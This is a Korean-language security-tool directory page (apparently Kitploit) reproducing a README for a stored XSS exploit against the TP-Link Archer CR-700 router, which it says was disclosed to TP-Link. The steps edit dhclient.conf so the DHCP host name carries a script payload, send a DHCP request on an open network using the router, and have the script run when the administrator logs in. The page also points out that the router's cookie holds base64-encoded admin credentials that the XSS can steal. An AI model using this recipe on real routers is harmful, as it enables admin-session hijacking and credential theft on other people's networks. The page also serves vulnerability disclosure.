Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
TP-Link-Archer-CR-700-XSS-Exploit — TP-Link Archer CR-700 라우터 익스플로잇. (TP-Link에 책임 있게 공개됨) | Kitploit
도구/GitHubGitHub/ayushman4/tp-link-archer-cr-700-xss-exploit
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubayushman4/tp-link-archer-cr-700-xss-exploit

TP-Link-Archer-CR-700-XSS-Exploit

TP-Link Archer CR-700 라우터 익스플로잇. (TP-Link에 책임 있게 공개됨)

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
319년 전아직 검토되지 않음

TP-Link-Archer-CR-700-XSS-Exploit

TP-Link Archer CR-700 라우터 익스플로잇. (TP-Link에 책임 공개됨)

1단계-> Linux 머신(Kali 또는 Ubuntu)에서 다음 명령을 입력하세요.

gedit /etc/dhcp/dhclient.conf

아래 줄을 주석 처리하세요. #send host-name = gethostname();

그 줄을 그 아래 줄에 복사하고 gethostname() 함수를 아래와 같이 XSS 스크립트로 변경하세요.

send host-name = "<script>alert(5)</script>";

2단계: 변경 사항이 적용되도록 Linux 시스템을 재시작하세요.

3단계: 아래 명령으로 라우터에 DHCP 요청을 보내 IP 주소를 받으세요. (TP-Link Archer CR-700을 사용하는 개방형 네트워크 라우터에서 시도하세요.)

dhclient -v -i wlan0

위 명령을 실행하면 라우터에 DHCP 요청을 보냅니다. DHCP 요청 시 호스트 이름이 전송되는데, 우리는 이를 강제로 XSS 스크립트 <script>alert(5)</script>로 설정했습니다.

4단계: 관리자 콘솔에 로그인하세요.

로그인하면 스크립트가 실행됩니다.

라우터에서 발견한 또 다른 문제는 CSRF 토큰이 없다는 것이었습니다. 라우터가 설정하는 쿠키에는 base64로 인코딩된 사용자 이름과 비밀번호가 포함되어 있으며, XSS 스크립트를 사용해 탈취할 수 있습니다.

참고: 위의 모든 정보는 TP-Link에 공개되었으며, TP-Link는 문제를 재현하고 수정을 위해 R&D 팀에 전달했습니다.

제품 URL: https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W

도구 다운로드